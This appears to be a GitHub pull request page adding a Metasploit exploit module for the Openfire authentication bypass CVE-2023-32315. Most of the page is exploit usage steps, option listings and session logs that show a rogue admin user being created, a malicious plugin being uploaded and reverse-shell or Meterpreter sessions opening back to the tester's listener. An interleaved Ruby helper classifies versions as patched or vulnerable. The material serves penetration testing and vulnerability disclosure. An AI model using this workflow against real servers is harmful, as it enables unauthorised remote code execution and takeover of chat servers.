
Openfire Authentication Bypass RCE [CVE-2023-32315] #18173

Merged (8 commits) Jul 18, 2023

Conversation

h00die-gr3y
Contributor

@h00die-gr3y h00die-gr3y commented Jul 8, 2023

Openfire authentication bypass with RCE plugin

Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack
via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users.
This module will use the vulnerability to create a new admin user that will be used to upload an Openfire management plugin weaponized with a Java native payload that triggers an RCE.
This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.
The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the first version on the 4.8 branch, which is version 4.8.0.

This module has been tested on:

  • Ubuntu Linux 22.04.
  • Openfire 3.10.1, 4.0.4, 4.1.0, 4.2.0, 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.7.0, 4.7.1, 4.7.3
  • Java 7, 8, 17
  • Windows Server 2019 Datacenter
  • Openfire 4.7.3
  • Java 20

Instructions for an Openfire installation:
Download Openfire releases here.
Follow installation instructions here.

Verification

  • Start msfconsole
  • exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
  • set rhosts <ip-target>
  • set rport <port>
  • set target <0=Java Universal>
  • exploit
  • you should get a reverse shell or Meterpreter session depending on the payload and target settings
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > options

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host


Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal

Scenarios

Ubuntu 22.04 - Openfire 4.7.0 - java/meterpreter/reverse_tcp

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Openfire version is 4.7.0
[*] Grabbing the cookies.
[*] JSESSIONID=node010hllcuuhb19x13etracg8jjxk24.node0
[*] csrf=Lc9ZXFTo6H3bnC1
[*] Adding a new admin user.
[*] Logging in with admin user "jdajefap" and password "W3EozCK8Nx".
[*] Upload and execute plugin "U6zVD3dY" with payload "java/meterpreter/reverse_tcp".
[*] Sending stage (58851 bytes) to 192.168.201.59
[*] Meterpreter session 33 opened (192.168.201.10:4444 -> 192.168.201.59:60420) at 2023-07-08 10:33:16 +0000
[!] Plugin "U6zVD3dY" need manually clean-up via Openfire Admin console.
[!] Admin user "jdajefap" need manually clean-up via Openfire Admin console.

meterpreter > getuid
Server username: openfire
meterpreter > sysinfo
Computer        : cuckoo
OS              : Linux 5.15.0-76-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter >

Windows Server 2019 Datacenter - Openfire 4.7.3 - java/shell/reverse_tcp

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Openfire version is 4.7.4
[*] Grabbing the cookies.
[*] JSESSIONID=node01dr68xhv8giop14zogvh0ycnt13.node0
[*] csrf=mRz62R9hab6YAgt
[*] Adding a new admin user.
[*] Logging in with admin user "qkcvdmmevuvw" and password "tO0gWgDrM4".
[*] Upload and execute plugin "XZl3TKb1ayogynR" with payload "java/shell/reverse_tcp".
[*] Sending stage (2952 bytes) to 192.168.201.57
[!] Plugin "XZl3TKb1ayogynR" need manually clean-up via Openfire Admin console.
[!] Admin user "qkcvdmmevuvw" need manually clean-up via Openfire Admin console.
[*] Command shell session 32 opened (192.168.201.10:4444 -> 192.168.201.57:50171) at 2023-07-08 10:31:01 +0000


Shell Banner:
Microsoft Windows [Version 10.0.17763.107]
-----


C:\Program Files\Openfire\bin>systeminfo
systeminfo

Host Name:                 WIN-HHRQENPDSRS
OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00430-00000-00000-AA500
Original Install Date:     1/23/2023, 4:51:06 AM
System Boot Time:          7/8/2023, 2:16:23 AM
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2306 Mhz
BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 728 MB
Virtual Memory: Max Size:  3,469 MB
Virtual Memory: Available: 1,523 MB
Virtual Memory: In Use:    1,946 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.201.1
                                 IP address(es)
                                 [01]: 192.168.201.57
                                 [02]: fe80::b089:6587:7273:231e
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\Program Files\Openfire\bin>
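The PR description gives the affected range (3.10.0 onward) and the branch-specific fixed releases (4.6.8, 4.7.5, 4.8.0), and the module's check prints the detected version as `{"version"=>"4.7.3"}`. The following is an added triage helper, not part of the module or the Openfire project, that turns those stated ranges into a patched/vulnerable classification a defender can run against an inventory of version strings; the function and constant names are my own.

```ruby
# Added example: classify an Openfire version against the ranges stated in
# the PR text for CVE-2023-32315. Uses only Gem::Version from RubyGems.
require 'rubygems'

FIRST_AFFECTED = Gem::Version.new('3.10.0')          # first vulnerable release
FIXED_BY_BRANCH = {                                   # backported fixes per branch
  '4.6' => Gem::Version.new('4.6.8'),
  '4.7' => Gem::Version.new('4.7.5')
}.freeze
FIXED_FROM = Gem::Version.new('4.8.0')                # everything from 4.8.0 on is fixed

# Returns :vulnerable, :patched, :unaffected, or :unknown (unparseable input).
def openfire_cve_2023_32315_status(version_str)
  return :unknown unless version_str.is_a?(String) && version_str.match?(/\A\d+(\.\d+)+\z/)

  v = Gem::Version.new(version_str)
  return :unaffected if v < FIRST_AFFECTED
  return :patched if v >= FIXED_FROM

  # 4.6.x and 4.7.x received backported fixes; compare within the branch only,
  # so that e.g. 4.7.0 is not treated as fixed just because it is above 4.6.8.
  branch = v.segments[0, 2].join('.')
  fix = FIXED_BY_BRANCH[branch]
  return :patched if fix && v >= fix

  :vulnerable
end

# Extracts the version from the line the module's check prints,
# e.g. '[*] {"version"=>"4.7.3"}'. Returns nil when the line has no version.
def version_from_check_line(line)
  m = line.match(/"version"=>"([^"]+)"/)
  m && m[1]
end

# Constructed sample inventory (hostname => check output line), for a stand-alone run.
SAMPLE_LINES = {
  'chat-01' => '[*] {"version"=>"4.7.3"}',
  'chat-02' => '[*] {"version"=>"4.7.5"}',
  'chat-03' => '[*] {"version"=>"3.9.3"}'
}.freeze

if $PROGRAM_NAME == __FILE__
  SAMPLE_LINES.each do |host, line|
    ver = version_from_check_line(line)
    puts "#{host}: #{ver.inspect} -> #{openfire_cve_2023_32315_status(ver)}"
  end
end
```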

@bwatters-r7 bwatters-r7 self-assigned this Jul 10, 2023
@bwatters-r7
Contributor

It looks like there's a compiled java plugin required for this exploit module; can you please provide the source and build instructions?

@h00die-gr3y
Contributor Author

h00die-gr3y commented Jul 10, 2023

@bwatters-r7, you should have the source already.
I am using the exact same logic used at the openfire auth bypass module that was submitted in 2008 at Metasploit.
See openfire_auth_bypass.rb
See data directory

@bwatters-r7
Contributor

bwatters-r7 commented Jul 11, 2023

For future travelers, here is the PR that brought in the plugin: #522
https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/CVE-2008-6508/Example.java

@bwatters-r7
Contributor

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > check

[*] {"version"=>"4.7.3"}
[+] 10.5.134.129:9090 - The target is vulnerable. Openfire version is 4.7.3

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > 
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {"version"=>"4.7.3"}
[+] The target is vulnerable. Openfire version is 4.7.3
[*] Grabbing the cookies.
[*] JSESSIONID=node01xtz5e23yrkac16v8y6phlgwv18.node0
[*] csrf=OOYpLh1QMPrkUEo
[*] Adding a new admin user.
[*] Logging in with admin user "nrrjgkhhtubhh" and password "6CtQBuQKk".
[*] Upload and execute plugin "hXdXFCjYXvHp" with payload "java/meterpreter/reverse_tcp".
[*] Sending stage (58851 bytes) to 10.5.134.129
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:54320) at 2023-07-12 15:46:08 -0500
[!] Plugin "hXdXFCjYXvHp" need manually clean-up via Openfire Admin console.
[!] Admin user "nrrjgkhhtubhh" need manually clean-up via Openfire Admin console.

meterpreter > sysinfo
Computer        : ubuntu2204x64
OS              : Linux 5.19.0-41-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > getuid
Server username: openfire
meterpreter > 

@bwatters-r7
Contributor

A suggestion for sharing the files better: h00die-gr3y#1

h00die-gr3y and others added 3 commits July 15, 2023 11:46
Adjust files to be better shared
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
@bwatters-r7
Contributor

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Openfire version is 4.7.3
[*] Grabbing the cookies.
[*] JSESSIONID=node01odqjjp8uasbw1pnwewld8lgu81.node0
[*] csrf=KcWADPL8j2Q8LUB
[*] Adding a new admin user.
[*] Logging in with admin user "jlgkvghftyfl" and password "Eu0UcLO8".
[*] Upload and execute plugin "zxeKv0E7rwFk" with payload "java/meterpreter/reverse_tcp".
[*] Sending stage (58851 bytes) to 10.5.134.129
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:43500) at 2023-07-17 16:17:21 -0500
[!] Plugin "zxeKv0E7rwFk" need manually clean-up via Openfire Admin console.
[!] Admin user "jlgkvghftyfl" need manually clean-up via Openfire Admin console.

meterpreter > sysinfo
Computer        : ubuntu2204x64
OS              : Linux 5.19.0-46-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit 297c484 into rapid7:master Jul 18, 2023
34 checks passed
@bwatters-r7
Contributor

Release Notes

This PR adds a module for CVE-2023-32315, a remote code execution vulnerability for all versions of Openfire that have been released since April 2015, starting with version 3.10.0. Patched versions are 4.7.5+ 4.6.8+ and 4.8.0+.

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 21, 2023
@h00die h00die mentioned this pull request Aug 24, 2023